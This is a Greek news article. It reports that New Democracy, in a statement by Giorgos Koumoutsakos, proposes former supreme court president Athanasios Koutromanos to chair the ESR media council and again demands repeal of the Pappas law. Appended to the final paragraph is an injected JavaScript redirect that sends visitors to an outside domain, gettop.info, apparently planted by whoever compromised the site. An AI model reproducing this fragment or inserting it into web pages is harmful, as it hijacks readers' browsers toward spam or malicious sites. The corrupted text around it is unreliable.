Ο Αθανάσιος Κουτρομάνος, η πρόταση της ΝΔ για το ΕΣΡ

0
12

 

Τον τέως Πρόεδρο του Αρείου Πάγου Αθανάσιο Κουτρομάνο προτείνει η ΝΔ για τη θέση του προέδρου του ΕΣΡ. Με ανακοίνωση του κ. Κουμουτσάκου, η αξιωματική αντιπολίτευση επαναλαμβάνει την πάγια θέση της πως θα πρέπει πρώτα να καταργηθούν οι διατάξεις του νόμου Παππά για να προχωρήσει η διαδικασία εκλογής του νέου ΔΣ του ΕΣΡ.

Σε δήλωσή του, ο εκπρόσωπος της ΝΔ Γιώργος Κουμουτσάκος τόνισε πως «οι αυταρχικές μεθοδεύσεις της κυβέρνησης, με όχημα τον αντισυνταγματικό νόμο Παππά, για τη χειραγώγηση της Ενημέρωσης, οδήγησαν σε αδιέξοδο» και πως αυτό το αδιέξοδο πρέπει να αρθεί.

Σύμφωνα με τον κ. Κουμουτσάκο, ο κ. Κουτρομάνος είναι πρόσωπο με απόλυτα διαφανή δημόσια πορεία, εγνωσμένου κύρους και ευρύτατης αποδοχής, στο οποίο μπορούν να συμφωνήσουν όλες οι πολιτικές δυνάμεις.

«Η πρόταση Νόμου που παρουσιάσαμε η οποία καταργεί το νόμο Παππά και η υποψηφιότητα του κ. Κουτρομάνου επιβεβαιώνουν έμπρακτα τη συμβολή της Νέας Δημοκρατίας για λύση. Είναι η προϋπόθεση για να μπει οριστικό τέλος στη σημερινή νοσηρή κατάσταση και στα αδιέξοδα που προκάλεσε η Κυβέρνηση» υπογραμμίζει ο κ. Κουμουτσάκος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here